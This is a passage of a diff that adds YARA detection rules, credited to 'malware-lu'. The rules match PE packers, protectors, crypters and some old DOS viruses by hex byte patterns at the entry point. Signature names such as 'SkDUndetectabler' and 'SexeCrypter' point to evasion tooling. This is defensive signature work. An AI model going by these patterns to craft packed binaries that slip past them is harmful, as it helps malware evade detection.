+		$a0 = { E8 24 00 00 00 8B 4C 24 0C C7 01 17 00 01 00 C7 81 B8 00 00 00 00 ?? ?? 00 31 C0 89 41 14 89 41 18 80 A1 C1 00 00 00 FE C3 31 C0 64 FF 30 64 89 20 CC C3 }
+
+condition:
+		$a0
+}
+	
+	
+rule MSLRHv032afakeEXE32Pack13xemadicius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 3B C0 74 02 81 83 55 3B C0 74 02 81 83 53 3B C9 74 01 BC 56 3B D2 74 02 81 85 57 E8 00 00 00 00 3B DB 74 01 90 83 C4 14 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule eXpressorv11CGSoftLabs
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 15 13 00 00 E9 F0 12 00 00 E9 58 12 00 00 E9 AF 0C 00 00 E9 AE 02 00 00 E9 B4 0B 00 00 E9 E0 0C 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NsPackV11LiuXingPing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 00 00 00 00 5D B8 57 84 40 00 2D 50 84 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PrivatePersonalPackerPPPv102ConquestOfTroycom
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 17 00 00 00 E8 68 00 00 00 FF 35 2C 37 00 10 E8 ED 01 00 00 6A 00 E8 2E 04 00 00 E8 41 04 00 00 A3 74 37 00 10 6A 64 E8 5F 04 00 00 E8 30 04 00 00 A3 78 37 00 10 6A 64 E8 4E 04 00 00 E8 1F 04 00 00 A3 7C 37 00 10 A1 74 37 00 10 8B 1D 78 37 00 10 2B D8 8B 0D 7C 37 00 10 2B C8 83 FB 64 73 0F 81 F9 C8 00 00 00 73 07 6A 00 E8 D9 03 00 00 C3 6A 0A 6A 07 6A 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxHorse1776
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? 5D 83 ?? ?? 06 1E 26 ?? ?? ?? ?? BF ?? ?? 1E 0E 1F 8B F7 01 EE B9 ?? ?? FC F3 A6 1F 1E 07 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEShit
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 83 F9 00 7E 06 80 30 ?? 40 E2 F5 E9 ?? ?? ?? FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule DrWebVirusFindingEngineInSoftEDVSysteme
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 01 00 00 00 C2 0C 00 8D 80 00 00 00 00 8B D2 8B ?? 24 04 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PluginToExev100BoBBobSoft
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 29 C0 5D 81 ED D1 40 40 00 50 FF 95 B8 40 40 00 89 85 09 40 40 00 FF 95 B4 40 40 00 89 85 11 40 40 00 50 FF 95 C0 40 40 00 8A 08 80 F9 22 75 07 50 FF 95 C4 40 40 00 89 85 0D 40 40 00 8B 9D 09 40 40 00 60 6A 00 6A 01 53 81 C3 ?? ?? ?? 00 FF D3 61 6A 00 68 44 69 45 50 FF B5 0D 40 40 00 6A 00 81 C3 ?? ?? ?? 00 FF D3 83 C4 10 FF 95 B0 40 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RCryptorv15PrivateVaska
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 2C 24 4F 68 ?? ?? ?? ?? FF 54 24 04 83 44 24 04 4F B8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 06 80 30 ?? 40 EB F3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NeoLitev200
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B 44 24 04 23 05 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 04 FE 05 ?? ?? ?? ?? 0B C0 74 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PKLITEv200bextra
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 B8 ?? ?? BA ?? ?? 05 ?? ?? 3B 06 02 00 72 ?? B4 09 BA ?? ?? CD 21 B8 01 4C CD 21 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? EA ?? ?? ?? ?? F3 A5 C3 59 2D ?? ?? 8E D0 51 2D ?? ?? 50 80 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Crunch5Fusion4
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 15 03 ?? ?? ?? 06 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 55 E8 }
+
+condition:
+		$a0
+}
+	
+	
+rule MSLRHv032afakePEBundle023xemadicius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 02 00 00 00 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 07 30 40 00 87 DD 61 9D EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEMangle
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 9C BE ?? ?? ?? ?? 8B FE B9 ?? ?? ?? ?? BB 44 52 4F 4C AD 33 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WWPACKv302v302av304Relocationspack
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE ?? ?? BF ?? ?? B9 ?? ?? 8C CD 81 ED ?? ?? 8B DD 81 EB ?? ?? 8B D3 FC FA 1E 8E DB 01 15 33 C0 2E AC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UPXProtectorv10x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB EC ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NorthStarPEShrinkerv13byLiuxingping
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 2B E8 8D B5 73 ?? FF FF 8B 06 83 F8 00 74 11 8D B5 7F ?? FF FF 8B 06 83 F8 01 0F 84 F1 01 00 00 C7 06 01 00 00 00 8B D5 8B 85 4F ?? FF FF 2B D0 89 95 4F ?? FF FF 01 95 67 ?? FF FF 8D B5 83 ?? FF FF 01 }
+
+condition:
+		$a0
+}
+	
+	
+rule CodeCryptv015b
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 31 03 00 00 EB 02 83 3D 58 EB 02 FF 1D 5B EB 02 0F C7 5F }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPackFullEdition117Ap0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 33 FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv100
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB C4 84 40 ?? 87 DD 8B 85 49 85 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AHTeamEPProtector03fakeASProtect10FEUERRADER
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 60 E8 01 00 00 00 90 5D 81 ED 00 00 00 00 BB 00 00 00 00 03 DD 2B 9D }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule KGCryptvxx
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? 64 A1 30 ?? ?? ?? 84 C0 74 ?? 64 A1 20 ?? ?? ?? 0B C0 74 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxKBDflags1024
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B EC 2E 89 2E 24 03 BC 00 04 8C D5 2E 89 2E 22 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule yodasProtectorV102AshkbizDanehkar
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 03 00 00 00 EB 01 ?? BB 55 00 00 00 E8 03 00 00 00 EB 01 ?? E8 8F 00 00 00 E8 03 00 00 00 EB 01 ?? E8 82 00 00 00 E8 03 00 00 00 EB 01 ?? E8 B8 00 00 00 E8 03 00 00 00 EB 01 ?? E8 AB 00 00 00 E8 03 00 00 00 EB 01 ?? 83 FB 55 E8 03 00 00 00 EB 01 ?? 75 2E E8 03 00 00 00 EB 01 ?? C3 60 E8 00 00 00 00 5D 81 ED 23 3F 42 00 8B D5 81 C2 72 3F 42 00 52 E8 01 00 00 00 C3 C3 E8 03 00 00 00 EB 01 ?? E8 0E 00 00 00 E8 D1 FF FF FF C3 E8 03 00 00 00 EB 01 ?? 33 C0 64 FF 30 64 89 20 CC C3 E8 03 00 00 00 EB 01 ?? 33 C0 64 FF 30 64 89 20 4B CC C3 E8 03 00 00 00 EB 01 ?? 33 DB B9 3A 66 42 00 81 E9 1D 40 42 00 8B D5 81 C2 1D 40 42 00 8D 3A 8B F7 33 C0 E8 03 00 00 00 EB 01 ?? E8 17 00 00 00 90 90 90 E9 C3 1F 00 00 33 C0 64 FF 30 64 89 20 43 CC C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Obsidium1311ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 02 ?? ?? E8 27 00 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 22 EB 04 ?? ?? ?? ?? 33 C0 EB 01 ?? C3 EB 02 ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 03 ?? ?? ?? 50 EB 03 ?? ?? ?? 33 C0 EB 01 ?? 8B 00 EB 03 ?? ?? ?? C3 EB 01 ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 01 ?? EB 03 ?? ?? ?? 58 EB 03 ?? ?? ?? EB 01 ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 03 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01MicrosoftVisualC620Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 55 8B EC 83 EC 50 53 56 57 BE 90 90 90 90 8D 7D F4 A5 A5 66 A5 8B }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MEGALITEv120a
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? BA ?? ?? 05 ?? ?? 3B 2D 73 ?? 72 ?? B4 09 BA ?? ?? CD 21 CD 90 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule GoatsMutilatorV16Goat_e0f
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 EA 0B 00 00 ?? ?? ?? 8B 1C 79 F6 63 D8 8D 22 B0 BF F6 49 08 C3 02 BD 3B 6C 29 46 13 28 5D }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillo430aSiliconRealmsToolworks
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 44 64 65 44 61 74 61 20 69 6E 69 74 69 61 6C 69 7A 65 64 20 28 41 4E 53 49 29 2C 20 61 70 70 20 73 74 72 69 6E 67 73 20 61 72 65 20 27 25 73 27 20 61 6E 64 20 27 25 73 27 00 00 00 44 64 65 44 61 74 61 20 69 6E 69 74 69 61 6C 69 7A 65 64 20 28 55 4E 49 43 }
+
+condition:
+		$a0
+}
+	
+	
+rule Upackv038betaDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE B0 11 ?? ?? AD 50 FF 76 34 EB 7C 48 01 ?? ?? 0B 01 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 18 10 00 00 10 00 00 00 00 ?? ?? ?? 00 00 ?? ?? 00 10 00 00 00 02 00 00 04 00 00 00 00 00 38 00 04 00 00 00 00 00 00 00 00 ?? ?? ?? 00 02 00 00 00 00 00 00 }
+	$a1 = { BE B0 11 ?? ?? AD 50 FF 76 34 EB 7C 48 01 ?? ?? 0B 01 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 18 10 00 00 10 00 00 00 00 ?? ?? ?? 00 00 ?? ?? 00 10 00 00 00 02 00 00 04 00 00 00 00 00 38 00 04 00 00 00 00 00 00 00 00 ?? ?? ?? 00 02 00 00 00 00 00 00 ?? 00 00 ?? 00 00 ?? 00 00 ?? ?? 00 00 00 10 00 00 10 00 00 00 00 00 00 0A 00 00 00 00 00 00 00 00 00 00 00 EE ?? ?? ?? 14 00 00 00 00 ?? ?? ?? ?? ?? ?? 00 FF 76 38 AD 50 8B 3E BE F0 ?? ?? ?? 6A 27 59 F3 A5 FF 76 04 83 C8 FF 8B DF AB EB 1C 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 ?? ?? ?? ?? ?? 00 00 00 40 AB 40 B1 04 F3 AB C1 E0 0A B5 ?? F3 AB 8B 7E 0C 57 51 E9 ?? ?? ?? ?? E3 B1 04 D3 E0 03 E8 8D 53 18 33 C0 55 40 51 D3 E0 8B EA 91 FF 56 4C 33 D2 59 D1 E8 13 D2 E2 FA 5D 03 EA 45 59 89 6B 08 56 8B F7 2B F5 F3 A4 AC 5E B1 80 AA 3B 7E 34 0F 82 97 FE FF FF 58 5F 59 E3 1B 8A 07 47 04 18 3C 02 73 F7 8B 07 3C ?? 75 F1 B0 00 0F C8 03 46 38 2B C7 AB E2 E5 5E 5D 59 51 59 46 AD 85 C0 74 1F }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule DCryptPrivate09bdrmist
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B9 ?? ?? ?? 00 E8 00 00 00 00 58 68 ?? ?? ?? 00 83 E8 0B 0F 18 00 D0 00 48 E2 FB C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule kkrunchyV02XRyd
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BD ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF 4D 08 C6 45 0C 05 8D 7D 14 31 C0 B4 04 89 C1 F3 AB BF ?? ?? ?? ?? 57 BE ?? ?? ?? ?? 31 C9 41 FF 4D 0C 8D 9C 8D A0 00 00 00 FF D6 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SkDUndetectabler3NoFSG2MethodSkD
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 81 EC 10 02 00 00 68 00 02 00 00 8D 85 F8 FD FF FF 50 6A 00 FF 15 38 10 00 01 50 FF 15 3C 10 00 01 8D 8D F8 FD FF FF 51 E8 4F FB FF FF 83 C4 04 8B 15 ?? 16 00 01 52 A1 ?? 16 00 01 50 E8 50 FF FF FF 83 C4 08 A3 ?? 16 00 01 C7 85 F4 FD FF FF 00 00 00 00 EB 0F 8B 8D F4 FD FF FF 83 C1 01 89 8D F4 FD FF FF 8B 95 F4 FD FF FF 3B 15 ?? 16 00 01 73 1C 8B 85 F4 FD FF FF 8B 0D ?? 16 00 01 8D 54 01 07 81 FA 74 10 00 01 75 02 EB 02 EB C7 8B 85 F4 FD FF FF 50 E8 ?? 00 00 00 83 C4 04 89 85 F0 FD FF FF 8B 8D F0 FD FF FF 89 4D FC C7 45 F8 00 00 00 00 EB 09 8B 55 F8 83 C2 01 89 55 F8 8B 45 F8 3B 85 F4 FD FF FF 73 15 8B 4D FC 03 4D F8 8B 15 ?? 16 00 01 03 55 F8 8A 02 88 01 EB D7 83 3D ?? 16 00 01 00 74 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NTPacker10ErazerZ
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 E0 53 33 C0 89 45 E0 89 45 E4 89 45 E8 89 45 EC B8 ?? ?? 40 00 E8 ?? ?? FF FF 33 C0 55 68 ?? ?? 40 00 64 FF 30 64 89 20 8D 4D EC BA ?? ?? 40 00 A1 ?? ?? 40 00 E8 ?? FC FF FF 8B 55 EC B8 ?? ?? 40 00 E8 ?? ?? FF FF 8D 4D E8 BA ?? ?? 40 00 A1 ?? ?? 40 00 E8 ?? FE FF FF 8B 55 E8 B8 ?? ?? 40 00 E8 ?? ?? FF FF B8 ?? ?? 40 00 E8 ?? FB FF FF 8B D8 A1 ?? ?? 40 00 BA ?? ?? 40 00 E8 ?? ?? FF FF 75 26 8B D3 A1 ?? ?? 40 00 E8 ?? ?? FF FF 84 C0 75 2A 8D 55 E4 33 C0 E8 ?? ?? FF FF 8B 45 E4 8B D3 E8 ?? ?? FF FF EB 14 8D 55 E0 33 C0 E8 ?? ?? FF FF 8B 45 E0 8B D3 E8 ?? ?? FF FF 6A 00 E8 ?? ?? FF FF 33 C0 5A 59 59 64 89 10 68 ?? ?? 40 00 8D 45 E0 BA 04 00 00 00 E8 ?? ?? FF FF C3 E9 ?? ?? FF FF EB EB 5B E8 ?? ?? FF FF 00 00 00 FF FF FF FF 01 00 00 00 25 00 00 00 FF FF FF FF 01 00 00 00 5C 00 00 00 FF FF FF FF 06 00 00 00 53 45 52 56 45 52 00 00 FF FF FF FF 01 00 00 00 31 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SexeCrypter11bysantasdad
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 EC 53 56 57 33 C0 89 45 EC B8 D8 39 00 10 E8 30 FA FF FF 33 C0 55 68 D4 3A 00 10 64 FF 30 64 89 ?? ?? ?? ?? E4 3A 00 10 A1 00 57 00 10 50 E8 CC FA FF FF 8B D8 53 A1 00 57 00 10 50 E8 FE FA FF FF 8B F8 53 A1 00 57 00 10 50 E8 C8 FA FF FF 8B D8 53 E8 C8 FA FF FF 8B F0 85 F6 74 26 8B D7 4A B8 14 57 00 10 E8 AD F6 FF FF B8 14 57 00 10 E8 9B F6 FF FF 8B CF 8B D6 E8 DA FA FF FF 53 E8 84 FA FF FF 8D 4D EC BA F8 3A 00 10 A1 14 57 00 10 E8 0A FB FF FF 8B 55 EC B8 14 57 00 10 E8 65 F5 FF FF B8 14 57 00 10 E8 63 F6 FF FF E8 52 FC FF FF 33 C0 5A 59 59 64 89 10 68 DB 3A 00 10 8D 45 EC E8 ED F4 FF FF C3 E9 83 EF FF FF EB F0 5F 5E 5B E8 ED F3 FF FF 00 53 45 54 54 49 4E 47 53 00 00 00 00 FF FF FF FF 12 00 00 00 6B 75 74 68 37 36 67 62 62 67 36 37 34 76 38 38 67 79 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxGotcha879
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? 5B 81 EB ?? ?? 9C FC 2E ?? ?? ?? ?? ?? ?? ?? 8C D8 05 ?? ?? 2E ?? ?? ?? ?? 50 2E ?? ?? ?? ?? ?? ?? 8B C3 05 ?? ?? 8B F0 BF 00 01 B9 20 00 F3 A4 0E B8 00 01 50 B8 DA DA CD 21 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MZ0oPE106bTaskFall
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB CA 89 03 83 C3 04 87 FE 32 C0 AE 75 FD 87 FE 80 3E FF 75 E2 46 5B 83 C3 04 53 8B 1B 80 3F FF 75 C9 8B E5 61 68 ?? ?? ?? ?? C3 }
+	$a1 = { EB CA 89 03 83 C3 04 87 FE 32 C0 AE 75 FD 87 FE 80 3E FF 75 E2 46 5B 83 C3 04 53 8B 1B 80 3F FF 75 C9 8B E5 61 68 ?? ?? ?? ?? C3 FC B2 80 33 DB A4 B3 02 E8 6D 00 00 00 73 F6 33 C9 E8 64 00 00 00 73 1C 33 C0 E8 5B 00 00 00 73 23 B3 02 41 B0 10 E8 4F 00 00 00 12 C0 73 F7 75 3F AA EB D4 E8 4D 00 00 00 2B CB 75 10 E8 42 00 00 00 EB 28 AC D1 E8 74 4C 13 C9 EB 1C 91 48 C1 E0 08 AC E8 2C 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B3 01 56 8B F7 2B F0 F3 A4 5E EB 8E 02 D2 75 05 8A 16 46 12 D2 C3 33 C9 41 E8 EE FF FF FF 13 C9 E8 E7 FF FF FF 72 F2 C3 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule SoftDefenderv11xRandyLi
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 74 07 75 05 ?? ?? ?? ?? ?? 74 1F 75 1D ?? 68 ?? ?? ?? 00 59 9C 50 74 0A 75 08 ?? 59 C2 04 00 ?? ?? ?? E8 F4 FF FF FF ?? ?? ?? 78 0F 79 0D }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Upackv010v012BetaDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE 48 01 ?? ?? ?? ?? ?? 95 A5 33 C0 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AHTeamEPProtector03fakeBorlandDelphi6070FEUERRADER
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 53 8B D8 33 C0 A3 00 00 00 00 6A 00 E8 00 00 00 FF A3 00 00 00 00 A1 00 00 00 00 A3 00 00 00 00 33 C0 A3 00 00 00 00 33 C0 A3 00 00 00 00 E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule STProtectorV15SilentSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 4B 65 52 6E 45 6C 33 32 2E 64 4C 6C 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule ASPackv105bAlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 ?? ?? ?? ?? 5D 81 ED CE 3A 44 ?? B8 C8 3A 44 ?? 03 C5 2B 85 B5 3E 44 ?? 89 85 C1 3E 44 ?? 80 BD AC 3E 44 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXECryptor226minimumprotection
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 68 ?? ?? ?? ?? 58 81 E0 ?? ?? ?? ?? E9 ?? ?? ?? 00 87 0C 24 59 E8 ?? ?? ?? 00 89 45 F8 E9 ?? ?? ?? ?? 0F 83 ?? ?? ?? 00 E9 ?? ?? ?? ?? 87 14 24 5A 57 68 ?? ?? ?? ?? E9 ?? ?? ?? ?? 58 81 C0 ?? ?? ?? ?? 2B 05 ?? ?? ?? ?? 81 C8 ?? ?? ?? ?? 81 E0 ?? ?? ?? ?? E9 ?? ?? ?? 00 C3 E9 ?? ?? ?? ?? C3 BF ?? ?? ?? ?? 81 CB ?? ?? ?? ?? BA ?? ?? ?? ?? 52 E9 ?? ?? ?? 00 E8 ?? ?? ?? 00 E9 ?? ?? ?? 00 E9 ?? ?? ?? ?? 87 34 24 5E 66 8B 00 66 25 ?? ?? E9 ?? ?? ?? ?? 8B CD 87 0C 24 8B EC 51 89 EC 5D 8B 05 ?? ?? ?? ?? 09 C0 E9 ?? ?? ?? ?? 59 81 C1 ?? ?? ?? ?? C1 C1 ?? 23 0D ?? ?? ?? ?? 81 F9 ?? ?? ?? ?? E9 ?? ?? ?? ?? C3 E9 ?? ?? ?? 00 13 D0 0B F9 E9 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8B 64 24 08 31 C0 64 8F 05 00 00 00 00 5A E9 ?? ?? ?? ?? 3C A4 0F 85 ?? ?? ?? 00 8B 45 FC 66 81 38 ?? ?? 0F 84 05 00 00 00 E9 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? 87 3C 24 5F 31 DB 31 C9 31 D2 68 ?? ?? ?? ?? E9 ?? ?? ?? ?? 89 45 FC 33 C0 89 45 F4 83 7D FC 00 E9 ?? ?? ?? ?? 53 52 8B D1 87 14 24 81 C0 ?? ?? ?? ?? 0F 88 ?? ?? ?? ?? 3B CB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEProtector093CRYPToCRACk
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 5B 81 E3 00 FF FF FF 66 81 3B 4D 5A 75 33 8B F3 03 73 3C 81 3E 50 45 00 00 75 26 0F B7 46 18 8B C8 69 C0 AD 0B 00 00 F7 E0 2D AB 5D 41 4B 69 C9 DE C0 00 00 03 C1 75 09 83 EC 04 0F 85 DD 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PellesC300400450EXEX86CRTLIB
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? 83 EC ?? 53 56 57 89 65 E8 68 00 00 00 02 E8 ?? ?? ?? ?? 59 A3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPackv118BasicaPLibAp0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 1A 04 00 00 8D 9D C1 02 00 00 33 FF E8 61 01 00 00 EB 0F FF 74 37 04 FF 34 37 FF D3 83 C4 08 83 C7 08 83 3C 37 00 75 EB 83 BD 06 04 00 00 00 74 0E 83 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule vfpexeNcV500WangJianGuo
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 CC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FreeJoiner153Stubengine17GlOFF
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 33 FD FF FF 50 E8 0D 00 00 00 CC FF 25 08 20 40 00 FF 25 0C 20 40 00 FF 25 10 20 40 00 FF 25 14 20 40 00 FF 25 18 20 40 00 FF 25 1C 20 40 00 FF 25 20 20 40 00 FF 25 24 20 40 00 FF 25 28 20 40 00 FF 25 00 20 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule TheHypersprotectorTheHyper
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 EC 14 8B FC E8 14 00 00 00 ?? ?? 01 01 ?? ?? 01 01 ?? ?? ?? 00 ?? ?? 01 01 ?? ?? 02 01 5E E8 0D 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 8B 46 04 FF 10 8B D8 E8 0D 00 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 53 8B 06 FF 10 89 07 E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
